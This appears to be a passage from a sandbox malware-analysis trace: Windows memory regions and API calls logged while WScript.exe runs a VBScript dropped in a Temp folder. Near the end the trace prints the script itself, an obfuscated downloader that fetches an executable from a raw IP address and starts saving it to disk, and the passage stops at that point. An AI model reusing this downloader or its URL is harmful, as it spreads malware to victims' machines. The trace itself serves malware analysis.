end_va = 0x7435ffff
entry_point = 0x738e0000
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll")
Region:
id = 2513
start_va = 0x753e0000
end_va = 0x7541bfff
entry_point = 0x753e0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll")
Region:
id = 2514
start_va = 0x75f90000
end_va = 0x75f94fff
entry_point = 0x75f90000
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 2515
start_va = 0x5a0000
end_va = 0x5a0fff
entry_point = 0x5a0000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll")
Region:
id = 2516
start_va = 0x620000
end_va = 0x621fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 2517
start_va = 0x75f20000
end_va = 0x75f31fff
entry_point = 0x75f20000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll")
Region:
id = 2518
start_va = 0x76580000
end_va = 0x7671cfff
entry_point = 0x76580000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll")
Region:
id = 2519
start_va = 0x77750000
end_va = 0x77776fff
entry_point = 0x77750000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 2520
start_va = 0x4700000
end_va = 0x4af2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004700000"
filename = ""
Region:
id = 2521
start_va = 0x753b0000
end_va = 0x753d0fff
entry_point = 0x753b0000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")
Region:
id = 2522
start_va = 0x76530000
end_va = 0x76574fff
entry_point = 0x76530000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll")
Region:
id = 2523
start_va = 0x21c0000
end_va = 0x21c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021c0000"
filename = ""
Region:
id = 2524
start_va = 0x2210000
end_va = 0x222ffff
entry_point = 0x2210000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db")
Region:
id = 2525
start_va = 0x3110000
end_va = 0x314ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003110000"
filename = ""
Region:
id = 2526
start_va = 0x4b90000
end_va = 0x4c8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004b90000"
filename = ""
Region:
id = 2527
start_va = 0x75380000
end_va = 0x753adfff
entry_point = 0x75380000
region_type = mapped_file
name = "shdocvw.dll"
filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll")
Region:
id = 2528
start_va = 0x7ef92000
end_va = 0x7ef94fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef92000"
filename = ""
Thread:
id = 198
os_tid = 0x9bc
[0086.723] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afcc0 | out: lpSystemTimeAsFileTime=0x1afcc0*(dwLowDateTime=0xc5d86e80, dwHighDateTime=0x1d48634))
[0086.723] GetCurrentProcessId () returned 0x9c0
[0086.723] GetCurrentThreadId () returned 0x9bc
[0086.723] GetTickCount () returned 0x2314c
[0086.723] QueryPerformanceCounter (in: lpPerformanceCount=0x1afcb8 | out: lpPerformanceCount=0x1afcb8*=1816573300000) returned 1
[0086.723] GetStartupInfoA (in: lpStartupInfo=0x1afcd4 | out: lpStartupInfo=0x1afcd4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0086.724] GetModuleHandleA (lpModuleName=0x0) returned 0x630000
[0086.724] GetModuleHandleA (lpModuleName=0x0) returned 0x630000
[0086.725] GetVersionExA (in: lpVersionInformation=0x1afbe4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1000000, dwMinorVersion=0x1afb34, dwBuildNumber=0x0, dwPlatformId=0x1afd54, szCSDVersion="\xcd\x1e\xe9\x77\x58\xd8\x14") | out: lpVersionInformation=0x1afbe4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0086.725] GetUserDefaultLCID () returned 0x409
[0086.727] CoInitialize (pvReserved=0x0) returned 0x0
[0086.771] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS\" "
[0086.771] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS\" ") returned 85
[0086.771] GetCurrentThreadId () returned 0x9bc
[0086.771] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af9f4 | out: phkResult=0x1af9f4*=0x98) returned 0x0
[0086.772] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af9f8 | out: phkResult=0x1af9f8*=0x9c) returned 0x0
[0086.772] RegQueryValueExW (in: hKey=0x9c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1aeda8, lpData=0x1aedac, lpcbData=0x1aeda4*=0x400 | out: lpType=0x1aeda8*=0x0, lpData=0x1aedac*=0x0, lpcbData=0x1aeda4*=0x400) returned 0x2
[0086.772] RegQueryValueExW (in: hKey=0x98, lpValueName="Enabled", lpReserved=0x0, lpType=0x1aeda8, lpData=0x1aedac, lpcbData=0x1aeda4*=0x400 | out: lpType=0x1aeda8*=0x0, lpData=0x1aedac*=0x0, lpcbData=0x1aeda4*=0x400) returned 0x2
[0086.772] RegQueryValueExW (in: hKey=0x9c, lpValueName="Enabled", lpReserved=0x0, lpType=0x1aeda8, lpData=0x1aedac, lpcbData=0x1aeda4*=0x400 | out: lpType=0x1aeda8*=0x0, lpData=0x1aedac*=0x0, lpcbData=0x1aeda4*=0x400) returned 0x2
[0086.772] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0086.783] RegCloseKey (hKey=0x9c) returned 0x0
[0086.783] RegCloseKey (hKey=0x98) returned 0x0
[0086.783] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af7c4 | out: phkResult=0x1af7c4*=0x98) returned 0x0
[0086.783] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af7c0 | out: phkResult=0x1af7c0*=0x9c) returned 0x0
[0086.784] RegQueryValueExW (in: hKey=0x9c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1aeb50, lpData=0x1aeb54, lpcbData=0x1aeb4c*=0x400 | out: lpType=0x1aeb50*=0x0, lpData=0x1aeb54*=0x3, lpcbData=0x1aeb4c*=0x400) returned 0x2
[0086.784] RegQueryValueExW (in: hKey=0x98, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x1aeb50, lpData=0x1aeb54, lpcbData=0x1aeb4c*=0x400 | out: lpType=0x1aeb50*=0x0, lpData=0x1aeb54*=0x3, lpcbData=0x1aeb4c*=0x400) returned 0x2
[0086.784] RegQueryValueExW (in: hKey=0x9c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x1aeb50, lpData=0x1aeb54, lpcbData=0x1aeb4c*=0x400 | out: lpType=0x1aeb50*=0x0, lpData=0x1aeb54*=0x3, lpcbData=0x1aeb4c*=0x400) returned 0x2
[0086.784] RegCloseKey (hKey=0x9c) returned 0x0
[0086.784] RegCloseKey (hKey=0x98) returned 0x0
[0086.784] GetACP () returned 0x4e4
[0086.784] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76220000
[0086.784] GetProcAddress (hModule=0x76220000, lpProcName="HeapSetInformation") returned 0x76235651
[0086.784] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0086.784] FreeLibrary (hLibModule=0x76220000) returned 1
[0086.784] CoRegisterMessageFilter (in: lpMessageFilter=0x21380, lplpMessageFilter=0x21388 | out: lplpMessageFilter=0x21388*=0x0) returned 0x0
[0086.785] IUnknown:AddRef (This=0x21380) returned 0x2
[0086.785] GetModuleFileNameW (in: hModule=0x630000, lpFilename=0x1afa34, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\WScript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe")) returned 0x1f
[0086.785] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WScript.exe", lpdwHandle=0x1af448 | out: lpdwHandle=0x1af448) returned 0x704
[0086.785] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x1aed30 | out: lpData=0x1aed30) returned 1
[0086.785] VerQueryValueW (in: pBlock=0x1aed30, lpSubBlock="\\", lplpBuffer=0x1af444, puLen=0x1af440 | out: lplpBuffer=0x1af444*=0x1aed58, puLen=0x1af440) returned 1
[0086.786] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af458 | out: phkResult=0x1af458*=0x98) returned 0x0
[0086.786] RegQueryValueExW (in: hKey=0x98, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1ae824, lpData=0x1ae828, lpcbData=0x1ae820*=0x400 | out: lpType=0x1ae824*=0x0, lpData=0x1ae828*=0xcd, lpcbData=0x1ae820*=0x400) returned 0x2
[0086.786] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af454 | out: phkResult=0x1af454*=0x9c) returned 0x0
[0086.786] RegQueryValueExW (in: hKey=0x9c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x1af41c, lpData=0x1af450, lpcbData=0x1af424*=0x4 | out: lpType=0x1af41c*=0x0, lpData=0x1af450*=0xd6, lpcbData=0x1af424*=0x4) returned 0x2
[0086.786] RegQueryValueExW (in: hKey=0x9c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x1ae824, lpData=0x1ae828, lpcbData=0x1ae820*=0x400 | out: lpType=0x1ae824*=0x0, lpData=0x1ae828*=0xcd, lpcbData=0x1ae820*=0x400) returned 0x2
[0086.786] RegQueryValueExW (in: hKey=0x98, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x1af41c, lpData=0x1af450, lpcbData=0x1af424*=0x4 | out: lpType=0x1af41c*=0x0, lpData=0x1af450*=0xd6, lpcbData=0x1af424*=0x4) returned 0x2
[0086.786] RegQueryValueExW (in: hKey=0x98, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x1ae824, lpData=0x1ae828, lpcbData=0x1ae820*=0x400 | out: lpType=0x1ae824*=0x1, lpData="1", lpcbData=0x1ae820*=0x4) returned 0x0
[0086.786] lstrlenW (lpString="1") returned 1
[0086.786] lstrlenW (lpString="0") returned 1
[0086.786] lstrlenW (lpString="1") returned 1
[0086.786] lstrlenW (lpString="no") returned 2
[0086.786] lstrlenW (lpString="1") returned 1
[0086.786] lstrlenW (lpString="false") returned 5
[0086.786] RegCloseKey (hKey=0x9c) returned 0x0
[0086.786] RegCloseKey (hKey=0x98) returned 0x0
[0086.786] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x1af464, lpdwDisposition=0x0 | out: phkResult=0x1af464*=0x98, lpdwDisposition=0x0) returned 0x0
[0086.787] RegQueryValueExW (in: hKey=0x98, lpValueName="Timeout", lpReserved=0x0, lpType=0x1af428, lpData=0x1af458, lpcbData=0x1af430*=0x4 | out: lpType=0x1af428*=0x0, lpData=0x1af458*=0xa0, lpcbData=0x1af430*=0x4) returned 0x2
[0086.787] RegQueryValueExW (in: hKey=0x98, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x1ae830, lpData=0x1ae834, lpcbData=0x1ae82c*=0x400 | out: lpType=0x1ae830*=0x1, lpData="1", lpcbData=0x1ae82c*=0x4) returned 0x0
[0086.787] lstrlenW (lpString="1") returned 1
[0086.787] lstrlenW (lpString="0") returned 1
[0086.787] lstrlenW (lpString="1") returned 1
[0086.787] lstrlenW (lpString="no") returned 2
[0086.788] lstrlenW (lpString="1") returned 1
[0086.788] lstrlenW (lpString="false") returned 5
[0086.788] RegCloseKey (hKey=0x98) returned 0x0
[0086.788] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x1af464, lpdwDisposition=0x0 | out: phkResult=0x1af464*=0x98, lpdwDisposition=0x0) returned 0x0
[0086.788] RegQueryValueExW (in: hKey=0x98, lpValueName="Timeout", lpReserved=0x0, lpType=0x1af428, lpData=0x1af458, lpcbData=0x1af430*=0x4 | out: lpType=0x1af428*=0x0, lpData=0x1af458*=0xa0, lpcbData=0x1af430*=0x4) returned 0x2
[0086.788] RegQueryValueExW (in: hKey=0x98, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x1ae830, lpData=0x1ae834, lpcbData=0x1ae82c*=0x400 | out: lpType=0x1ae830*=0x0, lpData=0x1ae834*=0x31, lpcbData=0x1ae82c*=0x400) returned 0x2
[0086.788] RegCloseKey (hKey=0x98) returned 0x0
[0086.788] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS") returned 47
[0086.788] lstrlenW (lpString="vBS") returned 3
[0086.788] lstrlenW (lpString="WSH") returned 3
[0086.788] LoadStringW (in: hInstance=0x630000, uID=0x9c5, lpBuffer=0x1ad7b4, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
[0086.789] LoadTypeLib (in: szFile="C:\\Windows\\SysWOW64\\WScript.exe", pptlib=0x1aefdc*=0x0 | out: pptlib=0x1aefdc*=0x40fdb8) returned 0x0
[0086.794] ITypeLib:GetTypeInfoOfGuid (in: This=0x40fdb8, GUID=0x631acc, ppTInfo=0x1aefc4 | out: ppTInfo=0x1aefc4*=0x410eec) returned 0x0
[0086.801] ITypeInfo:GetRefTypeOfImplType (in: This=0x410eec, index=0xffffffff, pRefType=0x1aefb8 | out: pRefType=0x1aefb8*=0xfffffffe) returned 0x0
[0086.801] ITypeInfo:GetRefTypeInfo (in: This=0x410eec, hreftype=0xfffffffe, ppTInfo=0x649060 | out: ppTInfo=0x649060*=0x410f18) returned 0x0
[0086.802] IUnknown:Release (This=0x410eec) returned 0x1
[0086.802] ITypeLib:GetTypeInfoOfGuid (in: This=0x40fdb8, GUID=0x633c7c, ppTInfo=0x1aefb4 | out: ppTInfo=0x1aefb4*=0x410f44) returned 0x0
[0086.802] ITypeInfo:GetRefTypeOfImplType (in: This=0x410f44, index=0xffffffff, pRefType=0x1aefa8 | out: pRefType=0x1aefa8*=0xfffffffe) returned 0x0
[0086.802] ITypeInfo:GetRefTypeInfo (in: This=0x410f44, hreftype=0xfffffffe, ppTInfo=0x6490a0 | out: ppTInfo=0x6490a0*=0x410f70) returned 0x0
[0086.802] IUnknown:Release (This=0x410f44) returned 0x1
[0086.802] ITypeLib:GetTypeInfoOfGuid (in: This=0x40fdb8, GUID=0x633c8c, ppTInfo=0x1aefb4 | out: ppTInfo=0x1aefb4*=0x410f9c) returned 0x0
[0086.802] ITypeInfo:GetRefTypeOfImplType (in: This=0x410f9c, index=0xffffffff, pRefType=0x1aefa8 | out: pRefType=0x1aefa8*=0xfffffffe) returned 0x0
[0086.802] ITypeInfo:GetRefTypeInfo (in: This=0x410f9c, hreftype=0xfffffffe, ppTInfo=0x6490c0 | out: ppTInfo=0x6490c0*=0x410fc8) returned 0x0
[0086.803] IUnknown:Release (This=0x410f9c) returned 0x1
[0086.803] ITypeLib:GetTypeInfoOfGuid (in: This=0x40fdb8, GUID=0x631cac, ppTInfo=0x1aefb4 | out: ppTInfo=0x1aefb4*=0x410ff4) returned 0x0
[0086.803] ITypeInfo:GetRefTypeOfImplType (in: This=0x410ff4, index=0xffffffff, pRefType=0x1aefa8 | out: pRefType=0x1aefa8*=0xfffffffe) returned 0x0
[0086.803] ITypeInfo:GetRefTypeInfo (in: This=0x410ff4, hreftype=0xfffffffe, ppTInfo=0x649080 | out: ppTInfo=0x649080*=0x411020) returned 0x0
[0086.803] IUnknown:Release (This=0x410ff4) returned 0x1
[0086.803] IUnknown:Release (This=0x40fdb8) returned 0x4
[0086.803] GetCurrentThreadId () returned 0x9bc
[0086.803] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe8
[0086.803] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x632f25, lpParameter=0x225d0, dwCreationFlags=0x0, lpThreadId=0x225e4 | out: lpThreadId=0x225e4*=0x5f0) returned 0xf0
[0086.804] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x1af1dc*=0xe8, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
[0086.814] CloseHandle (hObject=0xe8) returned 1
[0086.814] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS", nBufferLength=0x104, lpBuffer=0x1af23c, lpFilePart=0x1af228 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS", lpFilePart=0x1af228*="ZMXZAA.vBS") returned 0x2f
[0086.814] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".vBS", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ae7d0 | out: phkResult=0x1ae7d0*=0x102) returned 0x0
[0086.814] RegQueryValueExW (in: hKey=0x102, lpValueName=0x0, lpReserved=0x0, lpType=0x1ae798, lpData=0x1ae7d4, lpcbData=0x1ae79c*=0x800 | out: lpType=0x1ae798*=0x1, lpData="VBSFile", lpcbData=0x1ae79c*=0x10) returned 0x0
[0086.814] RegCloseKey (hKey=0x102) returned 0x0
[0086.814] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ae7d0 | out: phkResult=0x1ae7d0*=0x102) returned 0x0
[0086.815] RegQueryValueExW (in: hKey=0x102, lpValueName=0x0, lpReserved=0x0, lpType=0x1ae798, lpData=0x1af00c, lpcbData=0x1ae79c*=0x200 | out: lpType=0x1ae798*=0x1, lpData="VBScript", lpcbData=0x1ae79c*=0x12) returned 0x0
[0086.815] RegCloseKey (hKey=0x102) returned 0x0
[0086.815] CLSIDFromString (in: lpsz="VBScript", pclsid=0x1aefdc | out: pclsid=0x1aefdc*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0
[0086.816] CoCreateInstance (in: rclsid=0x1aefdc*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x631aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1aefd8 | out: ppv=0x1aefd8*=0x22a50) returned 0x0
[0086.823] __dllonexit () returned 0x74fe7164
[0086.823] __dllonexit () returned 0x74fe717e
[0086.824] __dllonexit () returned 0x74fe7198
[0086.824] GetUserDefaultLCID () returned 0x409
[0086.824] GetVersion () returned 0x1db10106
[0086.824] DllGetClassObject (in: rclsid=0x418f04*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), riid=0x75d3ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ae2c4 | out: ppv=0x1ae2c4*=0x22a10) returned 0x0
[0086.825] VBScriptEngine5:IClassFactory:CreateInstance (in: This=0x22a10, pUnkOuter=0x0, riid=0x1aec70*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ae2b0 | out: ppvObject=0x1ae2b0*=0x22a50) returned 0x0
[0086.825] GetUserDefaultLCID () returned 0x409
[0086.825] GetACP () returned 0x4e4
[0086.825] VBScriptEngine5:IUnknown:AddRef (This=0x22a50) returned 0x2
[0086.825] VBScriptEngine5:IUnknown:Release (This=0x22a50) returned 0x1
[0086.825] VBScriptEngine5:IUnknown:Release (This=0x22a10) returned 0x0
[0086.825] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x22a50, riid=0x631aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1aefa0 | out: ppvObject=0x1aefa0*=0x22a50) returned 0x0
[0086.825] VBScriptEngine5:IUnknown:Release (This=0x22a50) returned 0x1
[0086.826] GetCurrentThreadId () returned 0x9bc
[0086.839] GetCurrentThreadId () returned 0x9bc
[0086.840] GetCurrentThreadId () returned 0x9bc
[0086.840] GetUserDefaultLCID () returned 0x409
[0086.840] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0086.840] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x1aef90, cchData=6 | out: lpLCData="1252") returned 5
[0086.840] IsValidCodePage (CodePage=0x4e4) returned 1
[0086.840] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x75cf0000
[0086.840] GetProcAddress (hModule=0x75cf0000, lpProcName="CoCreateInstance") returned 0x75d39d0b
[0086.840] CoCreateInstance (in: rclsid=0x74fdb234*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74fdb244*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x22c2c | out: ppv=0x22c2c*=0x409fd8) returned 0x0
[0086.841] IUnknown:AddRef (This=0x409fd8) returned 0x2
[0086.841] GetCurrentProcessId () returned 0x9c0
[0086.841] GetCurrentThreadId () returned 0x9bc
[0086.841] GetTickCount () returned 0x231b9
[0086.841] ISystemDebugEventFire:BeginSession (This=0x409fd8, guidSourceID=0x74fdb308, strSessionName="VBScript:00002496:00002492:18143801") returned 0x0
[0086.841] GetCurrentThreadId () returned 0x9bc
[0086.842] GetCurrentThreadId () returned 0x9bc
[0086.843] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x11c
[0086.843] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5be
[0086.843] CreateFileMappingA (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5be, lpName=0x0) returned 0x120
[0086.843] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x270000
[0086.844] GetVersionExA (in: lpVersionInformation=0x1af0ec*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x75f5b6d0, dwMinorVersion=0x1af170, dwBuildNumber=0x75f5b72a, dwPlatformId=0x77e3ffa6, szCSDVersion="\x5b\xdb\xf4\x75\x64\xf1\x1a") | out: lpVersionInformation=0x1af0ec*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0086.844] IsTextUnicode (in: lpv=0x270000, iSize=1470, lpiResult=0x1af198 | out: lpiResult=0x1af198) returned 0
[0086.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x270000, cbMultiByte=1470, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1470
[0086.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x270000, cbMultiByte=1470, lpWideCharStr=0x419d54, cchWideChar=1470 | out: lpWideCharStr="set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") \r\nDim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x \r\nDim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w \r\nDim B8yU2nW4oD3lW4vO1xP2nY9oR3e \r\nDim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i \r\nX3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" \r\nR2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" \r\nSet B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") \r\nB8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False \r\nB8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") \r\nIf B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then \r\nSet N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") \r\nN9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open \r\nN9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 \r\nN9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody \r\nN9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 \r\nN9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile 